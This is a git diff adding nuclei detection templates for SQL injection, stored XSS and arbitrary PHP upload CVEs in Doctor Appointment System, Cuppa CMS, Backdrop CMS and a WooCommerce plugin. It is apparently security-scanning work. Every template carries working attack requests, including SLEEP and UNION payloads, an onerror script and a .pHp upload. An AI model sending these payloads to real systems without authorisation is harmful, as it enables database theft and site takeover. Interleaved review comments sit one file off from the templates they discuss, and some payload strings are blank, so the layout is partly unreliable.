diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml
new file mode 100644
index 0000000000..fb291a6506
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27314.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27314
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27314
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-27314
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /admin/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(body, "Doctor Appoinment System")'
+ condition: and
diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml
new file mode 100644
index 0000000000..9b7fe7d367
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27315.yaml
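Review bot: The description says the injection is in `admin.php` while the only request posts to `/admin/`, so a reader cannot tell from the template which script is actually exercised; either align the description with the request path or add a comment stating that `/admin/` resolves to that script on this product. The body check `contains(body, "Doctor Appoinment System")` intentionally matches the application's own misspelled banner and deserves a comment such as `# "Appoinment" is the product's own spelling` so a later cleanup does not silently break the match. The detection rests on a single `duration>=6` threshold, which any host that takes six seconds to answer will satisfy; the same check is used unchanged by CVE-2021-27315, -27316, -27319 and -27320 in this commit, so noting that time-based false positives are expected on slow targets, or tightening the margin against `@timeout: 10s`, applies to all five.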
@@ -0,0 +1,38 @@
+id: CVE-2021-27315
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27315
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-27315
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /contactus.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 500'
+ - 'contains(body, "Medical Management System")'
+ condition: and
diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml
new file mode 100644
index 0000000000..c19fa1113c
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27316.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27316
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27316
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-27316
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /contactus.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ firstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 500'
+ - 'contains(body, "Medical Management System")'
+ condition: and
diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml
new file mode 100644
index 0000000000..a9c97c5ba9
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27319.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27319
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27319
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-27319
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /contactus.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 500'
+ - 'contains(body, "Medical Management System")'
+ condition: and
diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml
new file mode 100644
index 0000000000..3eb3155867
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27320.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27320
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27320
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-27320
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /contactus.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ firstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 500'
+ - 'contains(body, "Medical Management System")'
+ condition: and
diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml
new file mode 100644
index 0000000000..cd008f2a0b
--- /dev/null
+++ b/http/cves/2022/CVE-2022-24264.yaml
@@ -0,0 +1,57 @@
+id: CVE-2022-24264
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24264
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-24264
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+variables:
+ num: '999999999'
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ POST /components/table_manager/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ search_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_2
+ words:
+ - '{{md5(num)}}'
+ - 'td_available_languages'
+ condition: and
+
+ - type: word
+ part: header_2
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml
new file mode 100644
index 0000000000..ade4412978
--- /dev/null
+++ b/http/cves/2022/CVE-2022-24265.yaml
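Review bot: The login request is `POST /` and the injection `POST /components/table_manager/`, while the description places both under `/administrator/`, so the template only works when the supplied target already points at the administrator directory and nothing in the file says so. Add a comment in the info block, e.g. `# target must be the /administrator/ base URL of the Cuppa install`, or carry the prefix in the request paths themselves. Whether nuclei joins a raw request path onto the target URL's own path is not visible from this page, so the right fix depends on that behaviour. The same unstated assumption is made by CVE-2022-24265, -24266, -27984 and -27985 in this commit.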
@@ -0,0 +1,46 @@
+id: CVE-2022-24265
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24265
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-24265
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ @timeout: 20s
+ POST /components/menu/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "menu/html/edit.php")'
+ condition: and
diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml
new file mode 100644
index 0000000000..fd8db28259
--- /dev/null
+++ b/http/cves/2022/CVE-2022-24266.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-24266
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24266
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-24266
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ @timeout: 20s
+ POST /components/table_manager/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ order_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "list_admin_table")'
+ condition: and
diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml
new file mode 100644
index 0000000000..c979eab562
--- /dev/null
+++ b/http/cves/2022/CVE-2022-27984.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-27984
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-27984
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-27984
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ @timeout: 20s
+ POST /templates/default/html/windows/right.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "components/menu/classes/functions.php")'
+ condition: and
diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml
new file mode 100644
index 0000000000..2965631039
--- /dev/null
+++ b/http/cves/2022/CVE-2022-27985.yaml
@@ -0,0 +1,55 @@
+id: CVE-2022-27985
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-27985
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-27985
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+variables:
+ num: '999999999'
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ POST /alerts/alertLightbox.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile¶ms%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-¶ms%5Breference%5D=41&uniqueClass=new_content_3983163
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5(num)}}'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml
new file mode 100644
index 0000000000..e5fbe88025
--- /dev/null
+++ b/http/cves/2022/CVE-2022-42095.yaml
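Review bot: As rendered here the second request body reads `profile¶ms%5Bgroup%5D` and `--+-¶ms%5Breference%5D`, i.e. the `&para` prefix of `&params` has been decoded to `¶`; if the committed file really contains that character, the `params[group]` and `params[reference]` fields never reach the server and the `{{md5(num)}}` word matcher can never pass. Confirm the file holds the literal `&params%5Bgroup%5D=` and `&params%5Breference%5D=`. The same decoding artefact shows in CVE-2022-46020 in this commit, where `&section_blocks=true` is rendered as `§ion_blocks=true`. A one-line comment above the body noting that the `&` entities must stay literal would guard against future editor auto-decoding.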
@@ -0,0 +1,80 @@
+id: CVE-2022-42095
+
+info:
+ name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
+ author: theamanrawat
+ severity: medium
+ description: |
+ Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.
+ reference:
+ - https://github.com/backdrop/backdrop/releases/tag/1.23.0
+ - https://github.com/bypazs/CVE-2022-42095
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-42095
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2022-42095
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,cms,backdrop,authenticated
+
+http:
+ - raw:
+ - |
+ GET /?q=user/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?q=user/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
+
+ - |
+ GET /?q=node/add/page HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?q=node/add/page HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save
+
+ - |
+ POST /?q={{randstr}} HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_5 == 200"
+ - "contains(all_headers_5, 'text/html')"
+ - 'contains(body_5, "")'
+ - "contains(body_5, 'Backdrop CMS')"
+ condition: and
+
+ extractors:
+ - type: regex
+ name: form_id_1
+ group: 1
+ regex:
+ - 'name="form_build_id" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: form_id_2
+ group: 1
+ regex:
+ - 'name="form_build_id" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: form_token
+ group: 1
+ regex:
+ - 'name="form_token" value="(.*)"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml
new file mode 100644
index 0000000000..20edd67050
--- /dev/null
+++ b/http/cves/2022/CVE-2022-42096.yaml
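Review bot: The fourth request hard-codes the node author as `name=admin` together with fixed `scheduled`/`date` values from April 2023, so the template silently assumes the login account is called `admin`; the sibling CVE-2022-42096 template in this commit extracts `name` from the form with an internal extractor and posts `{{name}}`, and this template should do the same for consistency. The `form_id_1` and `form_id_2` extractors use the identical regex `name="form_build_id" value="(.*)"`, so after the third response both hold the same value and the second extractor adds nothing; a comment stating which response each is meant to be read from would make the intent checkable. Greedy `(.*)` before the closing quote also over-captures if further attributes follow on the same line, so `(.*?)` is the safer form. The third dsl entry, `contains(body_5, "")`, has had its argument stripped in this rendering and cannot be checked here.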
@@ -0,0 +1,185 @@
+id: CVE-2022-42096
+
+info:
+ name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
+ author: theamanrawat
+ severity: medium
+ description: |
+ Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
+ reference:
+ - https://github.com/backdrop/backdrop/releases/tag/1.23.0
+ - https://github.com/bypazs/CVE-2022-42096
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-42096
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2022-42096
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,cms,backdrop,authenticated
+
+http:
+ - raw:
+ - |
+ GET /?q=user/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?q=user/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
+
+ - |
+ GET /?q=node/add/post HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?q=node/add/post HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="title"
+
+ {{randstr}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="field_tags[und]"
+
+ {{randstr}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="body[und][0][summary]"
+
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="body[und][0][value]"
+
+
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="body[und][0][format]"
+
+ full_html
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
+ Content-Type: application/octet-stream
+
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="field_image[und][0][fid]"
+
+ 0
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="field_image[und][0][display]"
+
+ 1
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="changed"
+
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="form_build_id"
+
+ {{form_id_1}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="form_token"
+
+ {{form_token}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="form_id"
+
+ {{form_id_2}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="status"
+
+ 1
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="scheduled[date]"
+
+ 2023-04-25
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="scheduled[time]"
+
+ 16:59:23
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="promote"
+
+ 1
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="name"
+
+ {{name}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="date[date]"
+
+ 2023-04-24
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="date[time]"
+
+ 16:59:23
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="path[auto]"
+
+ 1
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="comment"
+
+ 2
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="additional_settings__active_tab"
+
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="op"
+
+ Save
+ ------WebKitFormBoundaryIubltUxssi0yqDjp--
+
+ - |
+ GET /?q=posts/{{randstr}} HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+ - 'Backdrop CMS'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: form_id_1
+ group: 1
+ regex:
+ - 'name="form_build_id" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: name
+ group: 1
+ regex:
+ - 'name="name" value="(.*?)"'
+ internal: true
+
+ - type: regex
+ name: form_id_2
+ group: 1
+ regex:
+ - 'name="form_id" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: form_token
+ group: 1
+ regex:
+ - 'name="form_token" value="(.*)"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml
new file mode 100644
index 0000000000..4c754a853b
--- /dev/null
+++ b/http/cves/2022/CVE-2022-4328.yaml
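Review bot: The final `GET /?q=posts/{{randstr}}` depends on Backdrop generating the URL alias `posts/<title>` from the random title via `path[auto]` set to `1` in the multipart body, and nothing in the template records that dependency; add a comment above the last request such as `# alias is derived from the title by path[auto]=1 under the default alias pattern` so a maintainer knows why the title must be reused verbatim. The unindexed `part: body` on the word matcher presumably applies to the last response only, which is what is intended here, but the sibling CVE-2022-42095 template uses explicit `body_5`, so pick one convention across the two. The first matcher word is rendered as `''` on this page and cannot be checked here.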
@@ -0,0 +1,56 @@
+id: CVE-2022-4328
+
+info:
+ name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
+ author: theamanrawat
+ severity: critical
+ description: |
+ The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
+ remediation: Fixed in version 18.0
+ reference:
+ - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
+ - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-4328
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-4328
+ cwe-id: CWE-434
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,rce,wordpress,wp-plugin,wp,n-media-woocommerce-checkout-fields
+
+http:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597
+
+ --------------------------22728be7b3104597
+ Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
+ Content-Type: application/octet-stream
+
+
+
+ --------------------------22728be7b3104597--
+
+ - |
+ GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "fe5df26ce4ca0056ffae8854469c282f"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml
new file mode 100644
index 0000000000..9771d90a5a
--- /dev/null
+++ b/http/cves/2022/CVE-2022-45037.yaml
